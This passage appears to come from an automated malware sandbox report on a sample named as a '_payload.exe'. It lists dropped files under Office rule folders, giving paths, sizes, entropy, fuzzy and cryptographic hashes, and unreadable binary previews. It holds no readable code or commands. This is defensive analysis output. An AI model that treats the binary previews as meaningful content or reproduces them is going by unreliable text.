                                                                                                                          Preview:<?xml....*m.|!."...#.J..r.I.p.7..)P...&....r..b.0......4r..T..4&..P..'..y..........1l[....8c..<...C"....._QC.../.8||....}].'....H.G,.....Ws...y.7W....`..zB..U....J..... ......H.$I.......-!.?'u..u.o...'.......T'.....bi......bOK~L?P.C}.]j...KL. e.<.gzz.F...e.Q.^|...?....\C."4H..gg1q.Y.....Z.[6.?...).'.5..&..J"e..X.;.h...w.T....M...X..L.>P......&N...|...1j.b..e.g....r.!.&z.dl.U.5(.%U...qr...C.../...V..q&..?.._.uC1.LE4_.M.....~_Joy".|..[...X.^...y......!8.(}.}.2...D..TR...Us...o..=.In.,....$.8..,......d.SH..C..S.r..s..u..;...R6.s.....d2%m.g....o.....p^.2..%.%P5I)w.{.sU...a.~O.L%...0."'.BK.....+t,1m.K...u.....y...0].iQ..2..H_.\.].................p...Z..!.7."^.Y....An....N..^5...].|k.'.U._..K.cZo...B..m.J.,:..g...S..w..A.F.z?Q.(..[..E..-.z.}.BZ....z~...<.w...)...^].4.H.g.i26........i.*.N..#..i0.r.....j.W.dz}.%..J`yd....j.R...... ......H.-.L.E..~..c.s......4.l.O...R.`#v..4p...F$a.+..>5n^h+m.k.{.&m,O...z...R&.../....V.._....1..N...#KNV......i.F.B

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703350v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1699
                                                                                                                          Entropy (8bit):7.8840521467138345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2POu7aPFFh9r7uQaU3hPIDz16FW8TnzdAgMWMD:2POu7EFFh9oChKG4j
                                                                                                                          MD5:5CE3C5B3A0AF2FF90780A27E1BCC4384
                                                                                                                          SHA1:0BE615EF887F89EE549153DEE74359AF52106B63
                                                                                                                          SHA-256:A5616B263C20F54AED51DD64619255EB9B52F756B22D50D5AAB6A71EE64B5EBC
                                                                                                                          SHA-512:1CE60C5741BFF0DDDC5ACE91ACC5F79A9ACFC20F705FD8F377202C4D6D902332693E49DF04571DC2B6BC10D700C3D3EEBF6012C5720E19713903C8D72B03C1B0
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml|..CF...=Q..T.~Mv.pGS..}TT.|a:.[%..5......wo4.R.v/I..N`..[.).V...5"H............I....^..X..o.=.....)K....=SB{....../u[...K...c,..j...g....f&3H8a......;>;$'0...YKD..zf..V..h?zbO...H.....^.s0J.-..|...[Z.t.$.......J'i..9.J.#`.X............u..:.........C.j..3@.(.:......../.....X........[.\.........I.<m...N.A3.LR.Kt..x.0...d....W3....B...y..9h..d.;....re.B.<1xs...m,...#.k..}6[...+.u+...R.lM..H..(.....3.+..]....(.K.....:3..LK......hb}..5N@>Z4...o.........s.g........-m.l/;....m..9.U.=./.'F6.S{%#.P.... ..g~oK.r`3Q.....tZa..._.c....bT.r.WD.nE.D=.!...I*7..3.l.7.g#:........~.....r.....z..P...-.@t6....z.z>DE.y..\...kr'.A..5..E...<...7.zP.#.<.I....6'P..t.t]....k.`TkF....3.>...{..............9...%..t..P.P.e..iI......../.L.&]UF.d.*,.......kH..t..[N7[....@..9.1.,......?(n..V.l1K....Vn...D)l...i.......k..Pl?3.jt...J-g..=..;..&O.c.a[.......u.4G..|.(14....!..r.o...#D.j..G.r.6.)..../~_....i.............i....X5.sl...Q..-.!.....}lS...h..G0%:kK@.B}......R.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703351v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1736
                                                                                                                          Entropy (8bit):7.892266468012537
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:d+yzZPX5eY9JHbxBlLF9u5OvaMoZSYqtjR+5Ypx82OmQzaD:d+SZxeY9ZlLF9uMpoZSYKeYsdzy
                                                                                                                          MD5:492EBD21DD065DA3361D0CD48C987AB1
                                                                                                                          SHA1:0CB3E99D1634691C115850018566FDDC49FDD6D3
                                                                                                                          SHA-256:760A2FB498C68FBC755EBD0472C8DED6AB8C6B43ECCC0677276B2AA4D71E1907
                                                                                                                          SHA-512:5F438C0039654A1B6BB8384C57E0D9B47A169E40DEE81B8572F898A0918351A35F0D637B8E979A2730FDDAC0D13767EF2AE8E566BD226EC6928B1FF99DE45D80
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..&.........^7.E.M.<.....%D,..........MK.....$...G....2.?UH..cC.\....{.d..;5....q..[/o.....!5.T.."..s....?a.9...q...9)....9.G....G..]]*W.9.PZ<.....5..@......R..f.M.L|...\.yB.W......C:.7f..._....TG.B.r....u)....8.....{P}<..v...r..S..e-B`(p..8."E.......Ad. f...|9..b....^.R.uFU...}.m.|.1.......rk<k."..Y+9..x.k2^......,@2.....P(.......3.g....D..j.x.QG............F.$...h..#....!..H.y..\6...L..4...T...E..5~.:...k....C..I$.&.M..:.#..h...P.y3z3\.....V...o..P u..t.:{....]..q~(....j)..d6....v.h._M...'.!.iV......~.c.6,6(.:$.6~.I....]..<.y..c...k.X%...U...|.F.Y.Z2.l'E.'Q..z,..........Cp0....S........ZT.C.C...L...2..r..Z]...r..o.............3...6.H...!.2....t.....m0.C....,..!O......z....P....P]J.u.Ml.....W?...O.`...F7...,I.Z..(E.K..._p...@d........./.'.........P...A....2b..h^....1......l.ys....Q.Tf....5.@z-50[K.9.d;..}.4...T...)x.&..\m...6.NB.}...y>..]H.'.s.Q?v..?. )..!..{..k$.V|.....J..?........[...Q.Ycv.cS...G.w.....HMd...... .Z.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703400v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1721
                                                                                                                          Entropy (8bit):7.896013041199013
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:IHJxvOFXW+ibpsr9n9Uu6QknR2AW6zp82y9g/ikD:IHmiqr9n9UIiAo8Pw
                                                                                                                          MD5:C2A4B02D66BA317C7EF5743895D5173C
                                                                                                                          SHA1:E3E3A809C056FBAA6040D49340142B01FAF373F1
                                                                                                                          SHA-256:12B8E6E1D9CA3209EE6702ACC3091845E9641235607999E10D82D11B2BD9F5DC
                                                                                                                          SHA-512:04D2B323D04304645B8256A9DA90AC4645540821736DAA6AAFDE252A6D72AE829D69A16C306EE48DE819D99B34062BE40187E10340907340FA16C50D5D90A790
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml..+...l......Bv...y..ZU=..G...o X.G.1..};..JrsgR0...>...%`u....@.....W%...r..z.."fcb.7.c.<..}l....v..6.o.X..HD....s."......5....J.K.mv.zb..|1E.&f..&8YeM..Sn..{`...8..F.X.^#....[.S...=.<p.)....J....;.."6vKoO.x*6>.-..-d:+DO.o...M.Z4V..I.O.d..W.E.9.......J.y.....=.qi...^..V..,.U..........t......9L......2.P...%...cW...`m.6..F.....j}.2...NX..C.....$.r... ...*.;..fWB:..E.Nc.L.O....J... .q..C.&k.ZL..U.]..."%P....s...J!/.2.......K.dG..].....n.....$...j.n6....H.`..+(.U.#}.I.....Y(..i...y.....M......;=....u.g...j.X..J.....].bl..~.!...~..b}...dR.$..F..j..%.H.......4...zh..L,.._\U.....f.c.*......8..,.`.....M..\...Xb.....(W..w#<.`".....S.lm6..d{.T....E......@Q.X_\m%V.+..0l`I.n.m7.#7L.......yg[=./`..#n..)..c.!.................7.5o/......X<9.s./..Ts.........q.B..?|D...(?..z.....p.>!..).g..I....?.......!W.3'}.x..,.........(.{~m...>...cP...)sy.U......f.9Ly.....}......I[...||@.9(.*K....{.c|7......5.t.....a.J..a................]&g.n....)U.%v..;.....n.ul.r]

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703401v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1758
                                                                                                                          Entropy (8bit):7.89127979959803
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:KjL8MQe4jYLPazkF6fbhu/4pQOccmj54EH6PRp/FaX6AXpND:f0ImYm6fdu/Euj5cRp/FaXdr
                                                                                                                          MD5:31BC43440C127FE79A0D6A1441DAE892
                                                                                                                          SHA1:273A0A98FD49DBB7C86CF9E11B3F44A3B28D0804
                                                                                                                          SHA-256:A353F4704F6384F176089F79CD4BAC8C227004196EDCE758C06F3EDB0B936F39
                                                                                                                          SHA-512:5F0D5B90E3F8011E37A12CAF69B332A5C6ECCD318DBB92EBD72692551F97E23695495B8AE67080D96EA85F5F7BE65D666434E3024DC227DA87D0F12EB5AAF7B8
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml...8.b. .i..:."....&..3i.]iuP..rv..$.TE......O..,..0`<.X:L.......<.\..qB...EHvGT...49..@..e."..3.....hJ7./......h.m,r....L..7.L..KgNY...K.B.QQ.B......d..C.....2D..O8...Z...K]....n....g..+..)..,.U:.N.S..p....T...J........=s...m=+j.O.i....z.RA~.\m.L....T.=....AO............B...D..s...._5.4#g.C.L...z.!2..,.j.'?...[.]..?.)L...kh..G..Z..l.i..}b...e...D@IiG.9(....\...".......}%..y..%.}...x.o.Y.7..T.).....:.H...4...xY....D.[..10..6I;ktPK=>...T6$D......B..~...9.u..-..]............Q~.#.2...Wmkh..'RF..x..\'ps.i-..}..:..m...........[....x....]..P=.......?r..Y.s.'..W5.G..>H.E.\.yr|].......k..Vt{...bms........kf..5Y.}.u.(.m[..5..I=/;>2..d.v..&f..@#+.bD..%#..a...Bd*;..Zh.i.".-......I.!J..~R...u.b..,......q_$...k...@.Q.....nO... ...2[...|..z..m.y.N.V.....4.I.&.2...WK......uN}.lo,C..T.._..^.Y..........I=.<Q..?..1.~.....~t&.I.'.n..H..!......S..R...v.|.E.J..u{.pqu.`..g..P.i^...2....~x./|<.....0.CV..O..<..!..R.R.0.....5....%..N.Pc...^u..M......;

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703450v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1705
                                                                                                                          Entropy (8bit):7.869593050815133
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:qE7jS2oJvAW10RokAxulHBHG5xujpwLyvXD9ixdD:qCjYBAJRokkshi0u
                                                                                                                          MD5:0ACCFE00ECD4CFAC44C65D2C02F2BCAD
                                                                                                                          SHA1:1FA0CB3A4A83793C08FFED218E2ED45A605BC4A9
                                                                                                                          SHA-256:C1647C0DD67657F3A4A17E83EBC9AB9435A83C7526B93FB36E8D01A42AA027CE
                                                                                                                          SHA-512:D4779D9D5F7ADD89BA67268E0BA4D01BFD9A96EDBD17A641E8E1752A6E609F55CF203295430D870F6D81E63C7264872F044CF7897313D3EF6C1615C68D226334
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.mR.K=..'...Z.........k[.G...L....9.........)....)9..c..W.z....s.|..{v.]..6...(..,>..2..`-.....8..Y.w^...c...Q.n...d...([./.XR...u.".2.....ZW......e.>..Q......2,.=...G.R..2K...q..*./l..*..5......O^...vM.F+...T......N....QP.o.].hG....7........8.7s;.....H~.A..h/.m..a..Prl3.s.*}.3.....P.....t...`.....]8..7.V....It.R.e..3<.$..9.M...u..&Q...p...>.f.....{...C...$....\.............k.'L.l...,P:...;U....+....J..z$....k......d.>.G9........9.....S.D.l....?&.......Vs.9G.t....t.R..(.f.4?..%......7...^X<.=.......b.g..F.g..I#m..'.'.9....i..T:.p.._.....H....y._0./o'I.@.d..)..0p..p.|+...z.G}.8...iw.#.6........l.k%.......}...........{.c1[...FL.Z.nUpGr...c..j..h7I.6.o.!^]...}x...!6<y/.a.u..@7P.....O......P.9X?....y..lDP.0cX./.xb....E..p..<.Q.?...8......N.gN.y...T".O<.J`.n.d.H.gN.P...\.[...pc...L.]U....T...<)3.~.mI...*....7........5.....sZn_.rw.y;*.u^jV.M........!r.....ZP..[~..h`.......v..m..,^GW.c...ovg.....j..~......y:."X..

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703451v1.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1742
                                                                                                                          Entropy (8bit):7.884783264596485
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:xladfkFw9Jo61VnZ2mEMG+SPNyAb+ofQYD:xlaVkmTn1VnZrIDlyAbcE
                                                                                                                          MD5:8BBAC94247A39F49A895521D1A2ED628
                                                                                                                          SHA1:9F2E0BF49D807C908DD4ACDCE3B3041183391F7A
                                                                                                                          SHA-256:B186431D4BD54B1E6800F1283308F56A77B557629F724B1DE8BCBF4009B74DDD
                                                                                                                          SHA-512:F87562029523F186995808DC303169DEDA5E878BB800F9E9830CDA9F53411DD422BF57A5061B3EEE738DAE19BB1220555300F198CDDD604489B3806E5B2ADE03
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml.?...SPw+,.h....-&s..Y.+...R..D.0...K.v...f......=uvyrRm.D.Md7......OEZ.n...x...#..?.#..V..g.x.&..".....xbo....Sn...~A.[..J.0k.d....m7.,y.E......l.*Ph.X,...*N.r.dzS.J.v.cI!h...:.......a...>..._W...t.G.Pt.i..]t...Y.1N..;.....X..._zh.oY.Tj...~w_ .G.OG.v..$.].}.....j..V....r..QM.a. *D...%..^s............G.!..i."[......:,..J.Q....s.I.....V..5,.4x..y.X6..LL/...B.9.T.......Wg.V..aoZxsOxG.....IC...7.#...S.h.ke.<.Ic..x.."+..[..H...+d.9.:...TC......A..5.".\&#..}..9X..H..U..Ye.i.b.;...`..e.1..U.`.s]+....^..t......oi..)".B.5.+~S&.2]..b.e<......%..;..Sz.!.......T.s5*.m...x....'6...k..l.,..]...o/..#9?$"..'...........O..L.........*D.*.?.9_..V.}..k......5p1.>...Dom..E.i..c..WU.....f.*".*...O..0>.f.SD/W.._.wJ..Cn|.e....~..2.9*<C.....`\Yn....e....rVo(...>.u.h4.5{6.x.....n..S..G.qf..j."...w}.h....Q*.OD;..w.....u`N..4.g}k3K~'...Z.. ...w...be'w./...e.....v....it.......=*t....F5v....,..3o.>.\....C..IU.?.d.+.&a|..4....X........8h...#......@..].l;....z.

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703500v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1695
                                                                                                                          Entropy (8bit):7.862326332863083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:FU6Ps64zwJfaT0XoEJ2cUzOV6SPg8q8UBu2Hs0lPHc1NMwZID6nIGizD5qg9+bD:NP35aTOJSSPg8qrT+NMwZIDtGG5qgqD
                                                                                                                          MD5:21E7423F9D4581433ADC04034EE40A0F
                                                                                                                          SHA1:E5D85079FC26C59CC88525078ECEDA4124B93102
                                                                                                                          SHA-256:CCAECDEAE0ABA29467D907B65F1D22DF90AD4D2CAE77ADF8032EC620FC00DB42
                                                                                                                          SHA-512:B2B76D689A59B2DCC4B123902EF29A55B3DC348D367E4B75A41F3D9211C82166C762223A7A7A14AA7177610CC7C57A2C2F3A16B5CF7FFB506CD350EC5FA0B256
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....A7.V5.....1.#.9(......3.Fg./....JJ.WG....W|.^.O.[6.|?......$.T..I5AK7~QA...0.r......j...q0N..h2...64..[e....f..I...../..(.[X..'.*.%.O#q2...7.(.(A5...g.k..j.j..C...D..h...v)...6JX<!.....f...M,...}.=..F.X.+..`..H............._(..e.......Q<r_... ....Y.q..P.O.J..z..ZP.*..3-..fUb.......!.rC.........|...w..>.'...[XsJ....k....l...T....R....J...}?...^.x)J..d..@...%b..n.......5...M...E(h... _Q...X..K.mpWyl.khf.,..H.C!.6.b.....k......e...9~#...=..9.%;..?.V.S..... .-nY.........T...}...pP.D...i`..qz[...eH.~5$ps/^....R?&.6.........,[~..p.....r.,...?#..np..._k|....L..l.d.%..{.........p...c.G..3..q>..]..X..V.h..~x.X7.2n{..h..M.(.YY.....x&.. .......P.3Y...$Oi.H...;..C..Ra.8....%.h..(...3E..G..MU1.....Qycg...g=.........{h4q...O!.{...{..k..zW).W..iI].`..~_s.D.Q....k......t%.z.^.OK.".;,..z....s.&,..5..*..&..._2a....:..B.p......ou.....2.'x.K0............_g[.r....?.......9o.sxY..?.=.Ys...u....C6.3p.^$..U...OR&.a...,.....8A.e.8...I..].v.}.......

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703501v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1732
                                                                                                                          Entropy (8bit):7.8942934767950135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:8jww5Qg77td+7YztTYPjlTGQf2rhBfyX53JBxG6NMVHxD:8jxyg77ncCePhTGxrhBfk53HKVZ
                                                                                                                          MD5:8D9184857CB3755E2624C84A4AA7AA77
                                                                                                                          SHA1:FB2CF5015985F4D1E76D84327450BEC5C053AFD5
                                                                                                                          SHA-256:3F07E65FFB6EB14BCCF3AF759A8C9C07FDF30D667737198F1DB85E9A933366FB
                                                                                                                          SHA-512:28020A0BAD86E0852197949E62BF25F461FFD503CB9D82E89EB754B90AA4EB95D202B87DAC4FCE55B8E8B85E44962F53A849D831B877BB51A1CF158D815AFE4B
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....,b9.?Z!..5-...^...s1..9N..GF..u.xg.O d..3....,.^....C.9..o...,>.....D.q.q.!...4.P@.q..{5O.}P........vG.....( .q...N..2ZDXX..N`....|4N......>...lY..P.<3.....Cqt".....T.*....c.F.H....s..~..w....;..x.&n..(..eSS.'#.K...9...d...*.V..^F.c.|KE...&..?.Sb...s....;..7..{j...%..4..h.S......'V@[.o^..#~..l..w..`.w...E....l...3 H..G...})}8..I..$.^....c3.\'.{I}.:..G......Bo...k.+.[..;...Ws..6.C[v.......w#...1m.-...N.V........c. ..*r.Aoy.f..w1.q..qt...'..BT...'L...Rfl...&B.{.6..&.A..i.M....m....}.]..Zh.......".'...p..Q....<.D.s.A=.M..N..9L...@.... .8Y..'M_:..H.2l....&V..w.....<)f.{.J...(f..vL^.....X..~e...cu....I....Z.....=...X.k./(..K...6..g2.u.....".i).3V.>.......Y.A..k...:.....t.......@.A...[+.$...6...-...2..6P.;.h..45..;....~.....De.@./.)j(>..?B.......s.<.......t..6.].`..G.G..5.G....4.H...c..% E.k....#...d.M..H.+.1...%=....3N.$.o..>.f..S....Y.7.0...%..d....L.3}>.g.0...Je=..k@n...U:...j5......+..:".~G.....R....<.Lj}..P\...i...Z,....[0.z

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703550v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1705
                                                                                                                          Entropy (8bit):7.875140784643285
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:P8qP1qciMVXSk5m8+p1pQy6gFmXadschRcqZFpODjWF82lwDSvN0kqHRThRMHRu5:EqNJ0k5m8K1pQZG9AKGJmvKBxThkqBD
                                                                                                                          MD5:BE753526775A14508A0B8A03A12456AC
                                                                                                                          SHA1:BD2F135CFB3335E0BFB32F792BD2907FCEC183B5
                                                                                                                          SHA-256:4D22BA2A4A343907C2AB0D1649FCB576004BEB55E27BD428B8043E5D90D5178F
                                                                                                                          SHA-512:E794FD77C80BC9171A3DE7E3D800C1BD7E5D7DE4AE34AB9CF8F979CA3A8D9454BDF7B77102C977A772191B8ACA10C64CE649084C454EA7A25FF244AEB5DD595C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml....51...5..[.!1..../...W.>e\.X2....n..k....cX.Sfx;.w.<......t..~_J..G"...op"...[.<...A.k)`w.k....o`J..&ifX..%.Lp.. j....N...!..I.[..{.UA? ....=.4.R..U.....%...[.If<...%.i.Gr.........(..V......a.....N.g.F..........4....U.....;K.m.m..R.F..k..bi..Q8..D.j..am}0.a.(..0(...@.7....QW[m...jYv.....x..Te..T...sN`f.Si...JM#EQ..}....o..Q3...9Z.m.8.........9*,..\..h.w..0........z..[.}.7.s..i....?.7...Ez..E..T....`.+^..Jq.jL..|vn....^*H.0O.1.#......%.v..........._{.T~.stj.{};...d...?.S.;]Q.CH07K.D.VK.g....^.X.....c..M..\.Q....@..a...>p.=.p.....1k4pX...a.p.T...;Q[:...K=*-.[.5.)S.....5....0...c...C.....6..5.B....m...dVl.U8E.....^..~f.Z...`5.~.FL.M3......`Mi...o..X..C.D...L.r.5.."J.$.....Ok.`0.c..+..t.ks.,X.V.X|d.m"W..|_.e.0......y....c[.2...KXN.X..qB..}.#f.r...IaD..I....C.r.~d..6w.aq._..I.*Ak.la.Mc.t).&P..{......|dR...l."8...6.5.x.../...>..|......:6.....! ..p..,"ZC..^h..[.y..#...'+..:..H...N5.]HV..k."%..9...H..k..S._&....e3...H....].).i*..z.....f

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703551v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1742
                                                                                                                          Entropy (8bit):7.889047209427386
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:bnOKsVDdx62IGYNh8i8wjYVdNXdvupyNO5aD:bnO7dbUNh8RfVdNXNjNOk
                                                                                                                          MD5:BC48861944C5E47AAB43FFD436815D51
                                                                                                                          SHA1:B2902FEA007B0BCE21ED2B259B83E1E47043E7C1
                                                                                                                          SHA-256:4708159C02C1F132E0721BD0A6DBA81FABD65E54163A9844743AC83D94F57D57
                                                                                                                          SHA-512:FC1CF9AE43AB285A34332FFC9D2A17CD6B65F49FE01C021BFE11AF6DCC76606DF7327A8D606724368C0EF826309455C432BA99179E06B17DD1AE1FFB5CF2DB46
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xml/...Zt@.....).g9.)......b}.NF.y.X..N....o...+..Y...;l..M\.N7.JjszA..W..gDi.rx..<..O..;c.....v'=...z]..H..P_*...ba.$...#..5......=...-...."............v_1..^it.....~...`.h;...C>...,FKz.p.]..Xj.;.h..;..Q.F...t..%.."...L..22.(84....1+..#.4.;.Lc0...,OW.O.3.o#....\.../0.K.....a3.%.M...._...@.@....G...9.....d7.n..b-...7.[..xa.J5..O.x...0%....g..rc.d.........*Ye<...Q:r....q9.>.H...DP...*f.g..^..?..Z.4.g.#.~..8@....#`#.D.g!-&..f.vt.....R.=..\?..q..f -.1.u;..5..._6}+.....z>....^.#......T..bL.m.?o.....j.v#.p.]o.3..^...Jj..L.-.l*..Y.Ma...|...m.Q..9...)..e...:.4..Aw....<K.gY0......7...!M.?...J..."..d...@.........~....+.e/,#...)......v.p....|.8.....+.F.. g.D.#.'RIw.b.....`.'[.c.`.^_..U.....CW......F..f.....GS.T..bi..F...%f.{.:..=4.9.2...9~.+;7.....O.8.%...Y2...u........U.3B$7.>...hin^iS.P.*...f .:.^s(....Ea.h.xr.....f..6&...q.1I5....,.m.=.?...a.~.>~.<.vI.m.wxd....l"..........Wt..(R.e.j.:.W......6.....7....?......a...q...S<.3......(Z.....W

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703600v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1691
                                                                                                                          Entropy (8bit):7.87516648102195
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:QZZ5ISl2xO8+x02hSLHZwy642ZbK4AlNy9MUD:Qn+TxOL0VZwyq1XMA
                                                                                                                          MD5:CB7CF816D7C419B727089DC6950EDBE4
                                                                                                                          SHA1:1E225A1286D031C0595E28FB9805B47E85D991A0
                                                                                                                          SHA-256:1819DE0CD6857EDE34EEEEBF8F32FF38CD6EEC05365988A1BC6AFDC81E078D3A
                                                                                                                          SHA-512:C4564A9A59C10FDCE52A81E0A23871B207E8D6F6B0DFF8C349F5661800D81940C9F4776C1A6E46921093EAEFA43F71EF157756F8000F854A76ED7F68A8ED155D
                                                                                                                          Malicious:false
                                                                                                                          Preview:<?xmlEN...dN3.Y%%C@.|{...... /1..XV......(.......@.H"..@.%K........>.p..q`W@T|.Z.. B.l......G}..|.I.Q...W=.}D3..oQ.).z.....Wz9..$..J......y..9*F..Y]6.aZ.:q..b.,..1.. ...{......qi8?.....(........R.Z.....M.2..6y.......7.a4....A..Xv.U..E..dh9........d..T.>.........|......../a.....@0.W.*.........`..}.eme..U.j{........1.......}.D.KJo+.V.....89.......r.....i.sZ.(....&..........1....xN.i../.2&..,#.._Jq.$.T.G....]..!...3.u....k.^.....l......E.S....../..~...=...............C.m...hJgRYx`8X. ......8.|..*......%Y....8...*.S..Yi..8.3nZ>{.e]/F.}..t.....R..^...X'.......n.c.D....`E"...c.V.P.'.......S...geo.Hv.].$.^.g.?.bH;.?._~..U.0..3..1.*......u....b{H....$.)0..RB......>d.i.d'$.@B ...E(W.M.FZ9....~..+.Au.IB.,....-.`..-..j4..U..B....An^....3.......q..!..4...RP....!..\...o.e....7..x`%.....%.e^1.Q......q9..^G......?..M8'l..4e...V....k'.&..>...E<.k. .v..vyyj..[GJo.w._..9..y..s8.W'.{..C}.}K..L`.a,...D.LH.r.Zpd.#.}.......f......W.<"mu...e...."A.%....e...y.)

                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule703601v0.xml

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1728
                                                                                                                          Entropy (8bit):7.89321407968491
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:AUcTjpIQdT1m1w2idjzmjYhbaGWRvM+pSi6LFkSpEhovvQZ/Kzg9bFy2mwbD:XMpIQ72uQ4GMOK1pTvY5KGbFy2mqD
                                                                                                                          MD5:BBB38DEAB936B1A2DEBB1404D4A5D08E
                                                                                                                          SHA1:ECB23D65500F5049EF0F6D25271E3D5ACE8579E8
                                                                                                                          SHA-256:943A203F4A1028B8F5A4F2DC67681EB34793F1802E2C1A0BC49F5C8FA4AF5479
                                                                                                                          SHA-512:DA54DCFFA032F0D94958D92E5B440ED3926BC7C31E9692DB2103D7E751B11ADCB0283179C47A4751BBF1D4F3786D169B435352B3C325B4A9975E5BD9F8E23D1C
                                                                                                                          Malicious:false
